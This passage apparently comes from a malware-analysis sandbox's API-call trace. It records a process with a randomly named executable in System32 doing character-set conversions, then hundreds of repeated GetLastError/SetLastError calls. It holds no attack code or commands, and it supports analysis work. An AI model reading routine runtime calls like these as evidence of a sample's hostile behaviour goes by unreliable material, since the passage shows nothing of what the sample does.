\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿⴾ矲狰Ā", cchSrc=256, lpDestStr=0x1aed78, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x1af554, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿZ\x87Yô\x8c÷\x1a", lpUsedDefaultChar=0x0) returned 256 [0032.813] GetLastError () returned 0x0 [0032.813] SetLastError (dwErrCode=0x0) [0032.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af654, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af654, cbMultiByte=256, lpWideCharStr=0x1aefa8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿⴾ矲狰Ā") returned 256 [0032.813] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿⴾ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.813] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿⴾ矲狰Ā", cchSrc=256, lpDestStr=0x1aed98, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0032.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x1af454, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿZ\x87Yô\x8c÷\x1a", lpUsedDefaultChar=0x0) returned 256 [0032.814] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.814] GetLastError () returned 0x0 [0032.814] SetLastError (dwErrCode=0x0) [0032.814] GetLastError () returned 0x0 [0032.814] SetLastError (dwErrCode=0x0) [0032.814] GetLastError () returned 0x0 [0032.814] SetLastError (dwErrCode=0x0) [0032.814] GetLastError () returned 0x0 [0032.814] SetLastError (dwErrCode=0x0) [0032.814] GetLastError () returned 0x0 [0032.814] SetLastError (dwErrCode=0x0) [0032.814] GetLastError () returned 0x0 [0032.814] SetLastError (dwErrCode=0x0) [0032.814] GetLastError () returned 0x0 [0032.814] SetLastError (dwErrCode=0x0) [0032.814] GetLastError () returned 0x0 [0032.814] SetLastError (dwErrCode=0x0) [0032.814] GetLastError () returned 0x0 [0032.814] SetLastError (dwErrCode=0x0) [0032.814] GetLastError () returned 0x0 [0032.814] SetLastError (dwErrCode=0x0) [0032.814] GetLastError () returned 0x0 [0032.814] SetLastError (dwErrCode=0x0) [0032.814] GetLastError () returned 0x0 [0032.814] SetLastError (dwErrCode=0x0) [0032.814] GetLastError () returned 0x0 [0032.814] SetLastError (dwErrCode=0x0) [0032.814] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.815] GetLastError () returned 0x0 [0032.815] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.816] GetLastError () returned 0x0 [0032.816] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.817] SetLastError (dwErrCode=0x0) [0032.817] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.818] SetLastError (dwErrCode=0x0) [0032.818] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.819] GetLastError () returned 0x0 [0032.819] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.820] SetLastError (dwErrCode=0x0) [0032.820] GetLastError () returned 0x0 [0032.821] SetLastError (dwErrCode=0x0) [0032.821] GetLastError () returned 0x0 [0032.821] SetLastError (dwErrCode=0x0) [0032.821] GetLastError () returned 0x0 [0032.821] SetLastError (dwErrCode=0x0) [0032.821] GetLastError () returned 0x0 [0032.821] SetLastError (dwErrCode=0x0) [0032.821] GetLastError () returned 0x0 [0032.821] SetLastError (dwErrCode=0x0) [0032.821] GetLastError () returned 0x0 [0032.821] SetLastError (dwErrCode=0x0) [0032.821] GetLastError () returned 0x0 [0032.821] SetLastError (dwErrCode=0x0) [0032.821] GetLastError () returned 0x0 [0032.821] SetLastError (dwErrCode=0x0) [0032.821] GetLastError () returned 0x0 [0032.821] SetLastError (dwErrCode=0x0) [0032.821] GetLastError () returned 0x0 [0032.821] SetLastError (dwErrCode=0x0) [0032.821] GetLastError () returned 0x0 [0032.821] SetLastError (dwErrCode=0x0) [0032.821] GetLastError () returned 0x0 [0032.821] SetLastError (dwErrCode=0x0) [0032.821] GetLastError () returned 0x0 [0032.828] SetLastError (dwErrCode=0x0) [0032.828] GetLastError () returned 0x0 [0032.828] SetLastError (dwErrCode=0x0) [0032.828] GetLastError () returned 0x0 [0032.828] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.829] GetLastError () returned 0x0 [0032.829] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.830] GetLastError () returned 0x0 [0032.830] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.831] SetLastError (dwErrCode=0x0) [0032.831] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.832] SetLastError (dwErrCode=0x0) [0032.832] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.833] GetLastError () returned 0x0 [0032.833] SetLastError (dwErrCode=0x0) [0032.834] GetLastError () returned 0x0 [0032.834] SetLastError (dwErrCode=0x0) [0032.834] GetLastError () returned 0x0 [0032.834] SetLastError (dwErrCode=0x0) [0032.834] GetLastError () returned 0x0 [0032.834] SetLastError (dwErrCode=0x0) [0032.834] GetLastError () returned 0x0 [0032.834] SetLastError (dwErrCode=0x0) [0032.834] GetLastError () returned 0x0 [0032.834] SetLastError (dwErrCode=0x0) [0032.834] GetLastError () returned 0x0 